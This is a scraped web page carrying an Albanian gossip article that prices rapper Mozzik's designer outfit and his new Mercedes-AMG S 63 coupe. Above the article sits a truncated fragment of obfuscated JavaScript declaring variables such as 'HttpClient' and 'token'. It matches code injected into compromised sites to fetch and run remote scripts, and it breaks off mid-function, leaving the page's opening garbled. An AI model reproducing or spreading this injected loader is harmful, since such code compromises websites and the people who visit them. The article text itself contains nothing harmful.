;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Një stil jete i shtrenjtë, ja sa kushtoi vetura e fundit e Mozzik

By

Atij gjithmonë i kanë pëlqyer veshjet e brendeve luksoze me famë botërore.

Shpesh në klipe e kemi parë me peliçe origjinale e të shtrenjta e po ashtu të veshur në markat Gucci e Louis Vuitton, që kushtojnë sa qimet e kokës.

Ndërsa së fundmi, faqja e famshme shqiptare që bulon çmimet e veshjeve të figurave V.I.P, ka zbuluar çmimet e veshjeve të fundit të Mozzik.

Vetëm ora e tij e markës Rolex, kushton rreth 32 mijë euro, syzet e tij nga Louis Vuitton, 495 euro ndërsa kapelja nga Burberry, 270 euro. Xhaketa e tij e markës së famshme britanike Burberry, kushton 1550 euro ndërsa çizmet e tij të markës Louis Vuitton, 1490 euro. E të gjitha këto arrijnë çmimin 40.000 euro.

E teksa Mozzik rri mbrapa këtyre veshjeve super të shtrenjta, një veture super luksoze nuk kishte si të mungonte.

Bëhet fjalë për  një veture luksoze, që ai ia ka shtuar së fundmi koleksionit të tij. Është fjala për automjetin e tipit ‘Mercedes-AMG S 63 4MATIC+ Coupe’, çmimi i së cilës sillet rreth 170.000 dollarë (150.000 euro).

“Mirë se vjen në shtëpi”, ka shkruar ai, teksa e ka prezantuar veturën në rrjetet sociale.

 

 

Artikuj të ngjashëm